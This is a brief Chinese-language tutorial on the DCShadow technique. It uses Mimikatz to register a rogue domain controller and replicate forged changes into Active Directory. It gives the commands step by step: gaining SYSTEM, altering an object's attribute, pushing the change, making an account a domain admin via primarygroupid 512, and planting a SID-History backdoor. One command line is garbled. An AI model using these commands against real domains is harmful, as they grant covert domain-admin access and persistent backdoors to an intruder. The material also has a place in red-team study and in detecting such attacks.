原理
Mimikatz远程从DC中复制数据,即Dcsync;类似的dcshadow可以伪装成DC,让正常DC通过伪造的DC中复制数据。
步骤
1、通过dcshadow更改配置架构和注册SPN值,将我们的服务器注册为Active Directory中的DC
2、在我们伪造的DC上更改数据,并利用域复制将数据同步到正常DC上。
首先加载mimikatz的驱动保证你在system权限下:
! !processtokentoken::whoami
更改属性描述值
lsadump::dcshadow /object:CN=dc,CN=Users,DC=test,DC=org /attribute:description /value:”xxxxxx”
然后新开一个窗口,以域管权限运行mimikatz:
lsadump::dcshadow /push
然后win7的描述就更改为了我们刚才定义的内容。
然后我们就可以使用下面的方法,添加域管:
lsadump::dcshadow /object:CN=win7,CN=Users,DC=test,DC=org /attribute:primarygroupid /value:512或者是管理后门
lsadump::dcshadow /object:CN=dc,CN=Users,DC=seven,DC=com /attribute:sidhistory /value:S-1-5-21-1900941692-2128706383-2830697502-500
